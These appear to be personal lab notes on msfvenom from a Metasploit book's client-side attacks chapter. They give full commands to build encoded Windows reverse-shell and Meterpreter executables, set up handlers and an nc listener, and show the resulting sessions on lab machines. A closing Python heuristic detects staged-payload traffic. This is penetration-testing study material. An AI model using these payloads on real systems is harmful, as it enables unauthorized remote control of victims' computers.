Msfvenom_clientsideattacks Metasploit_Revelated_Sagar_Rahalkar
Incomplete notes on msfvenom from the book Metasploit Revealed by Sagar Rahalkar (client-side attacks chapter)
root@kali:~# msfvenom -h
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
Usage: /usr/bin/msfvenom [options] <var=val>
Example: /usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe
....
msfvenom -a x86 --platform windows \
-p windows/meterpreter/reverse_tcp \
LHOST=192.168.56.102 LPORT=8080 \
-e x86/shikata_ga_nai -f exe -o \
/root/payload_msfvenom_192_168_56_102_8080.exe
root@kali:~# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.56.102 LPORT=8080 -e x86/shikata_ga_nai -f exe -o /root/payload_msfvenom.exe
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 368 (iteration=0)
x86/shikata_ga_nai chosen with final size 368
Payload size: 368 bytes
Final size of exe file: 73802 bytes
Saved as: /root/payload_msfvenom.exe
root@kali:~#
where:
-a x86: the processor architecture
--platform windows: the platform
-p windows/meterpreter/reverse_tcp: the type of payload to create
LHOST=192.168.56.102: the IP it will connect back to (payload-specific parameters)
LPORT=8080: the port it will connect back to
-e x86/shikata_ga_nai: the encoder to use
-f exe: the type of file to create
-o /root/payload_msfvenom.exe: the output file
On the other side we have to start the listening socket/process,
waiting for the payload_msfvenom.exe we created to be executed.
root@kali:~# msfconsole -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set LHOST 192.168.56.102; set lport 8080; run;exit -y"
       =[ metasploit v5.0.20-dev ]
+ -- --=[ 1886 exploits - 1065 auxiliary - 328 post ]
+ -- --=[ 546 payloads - 44 encoders - 10 nops ]
+ -- --=[ 2 evasion ]

payload => windows/meterpreter/reverse_tcp
LHOST => 192.168.56.102
lport => 8080
[*] Started reverse TCP handler on 192.168.56.102:8080
When payload_msfvenom.exe is launched on the client,
the connection shows up on the server that was listening.
[*] Sending stage (179779 bytes) to 192.168.56.1
[*] Meterpreter session 1 opened (192.168.56.102:8080 -> 192.168.56.1:48116) at 2019-07-23 05:26:40 -0400

meterpreter > sysinfo
Computer        : W7B-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : es_ES
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >
Another way: I launch the "multi/handler" by hand from msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.56.102
set lport 8080
run
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > info

       Name: Generic Payload Handler
...
Description:
  This module is a stub that provides all of the features of the Metasploit payload system to exploits that have been launched outside of the framework.

msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.56.102
msf5 exploit(multi/handler) > set lport 8080
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.56.102:8080
[*] Sending stage (179779 bytes) to 192.168.56.104
[*] Meterpreter session 1 opened (192.168.56.102:8080 -> 192.168.56.104:49157) at 2019-07-25 16:50:22 -0400
meterpreter >
meterpreter > sysinfo
Computer        : W7MINPC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : es_ES
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >
Creating an unstaged reverse shell.
https://medium.com/@hakluke/haklukes-guide-to-hacking-without-metasploit-1bbbe3d14f90
msfvenom -a x86 --platform windows \
-p windows/shell_reverse_tcp \
LHOST=192.168.56.102 LPORT=8080 \
-e x86/shikata_ga_nai -f exe -o \
/root/msfvenom_unstaged_reverse_shell_192_168_56_102_8080.exe
root@kali:~# msfvenom -a x86 --platform windows \
> -p windows/shell_reverse_tcp \
> LHOST=192.168.56.102 LPORT=8080 \
> -e x86/shikata_ga_nai -f exe -o \
> /root/msfvenom_unstaged_reverse_shell_192_168_56_102_8080.exe
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of exe file: 73802 bytes
Saved as: /root/msfvenom_unstaged_reverse_shell_192_168_56_102_8080.exe
root@kali:~#
Now I set up a "listener" waiting for the payload to be executed
nc -nvlp 8080
and as soon as the payload is launched I have a command interpreter.
root@kali:~# nc -nvlp 8080
listening on [any] 8080 ...
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.101] 1041
'\\VBOXSVR\tmpW7\pentesting'
CMD.EXE se inició con esta ruta como el directorio actual.
No se permiten rutas UNC. Regresando de manera predeterminada al directorio Windows.
Microsoft Windows XP [Versión 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS>
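From the defender's side, the two transcripts differ in a way that is visible on the wire: the staged meterpreter/reverse_tcp client opens a small outbound connection and immediately receives a 179779-byte stage from the handler, while the unstaged shell_reverse_tcp client receives no such blob. The heuristic below, an added example that is not from the book or these notes, flags that staging pattern over constructed connection records in a Zeek-conn-log-like layout; the thresholds and the port list are assumptions to tune for a real network.

```python
"""Flag connections that look like the staged reverse_tcp handshake above:
a client sends almost nothing, then receives a stage-sized blob on an
uncommon port. Sample records are constructed, not real captures."""
from dataclasses import dataclass


@dataclass
class Conn:
    ts: float         # connection start (epoch seconds)
    src: str          # originator (the host that ran the payload)
    dst: str          # responder (the handler)
    dport: int
    orig_bytes: int   # bytes sent by the originator
    resp_bytes: int   # bytes sent by the responder
    duration: float


# Heuristic thresholds (assumptions). The x86 Meterpreter stage in the
# notes is 179779 bytes; a client sends only a few hundred bytes before it.
STAGE_MIN_BYTES = 100_000
STAGE_MAX_BYTES = 2_000_000
CLIENT_MAX_BYTES = 4_096
# Ports where large downloads are routine and this rule would be noisy.
COMMON_PORTS = {22, 25, 53, 80, 443, 445, 3389}


def looks_like_staging(c: Conn) -> bool:
    """True when the responder pushes a stage-sized blob while the
    originator has sent very little, on a port not in COMMON_PORTS."""
    if c.dport in COMMON_PORTS:
        return False
    return (STAGE_MIN_BYTES <= c.resp_bytes <= STAGE_MAX_BYTES
            and c.orig_bytes <= CLIENT_MAX_BYTES)


def find_suspect_sessions(conns):
    """Return the records that match the staging heuristic."""
    return [c for c in conns if looks_like_staging(c)]


# Constructed sample: the first record mirrors the handler output in the
# notes (192.168.56.1 -> 192.168.56.102:8080, 179779-byte stage received).
SAMPLE = [
    Conn(1563874000.0, "192.168.56.1", "192.168.56.102", 8080, 912, 179779, 120.0),
    Conn(1563874001.0, "192.168.56.1", "10.0.0.5", 443, 3500, 250000, 2.1),  # normal TLS download
    Conn(1563874002.0, "192.168.56.1", "10.0.0.9", 8080, 700, 1200, 0.3),    # small, benign
]

if __name__ == "__main__":
    for c in find_suspect_sessions(SAMPLE):
        print(f"possible staged payload: {c.src} -> {c.dst}:{c.dport}, stage {c.resp_bytes} bytes")
```

An unstaged shell_reverse_tcp session produces no stage transfer, so this rule will not catch it; pair it with process-level telemetry (cmd.exe spawned by an unexpected parent with an outbound socket) for that case.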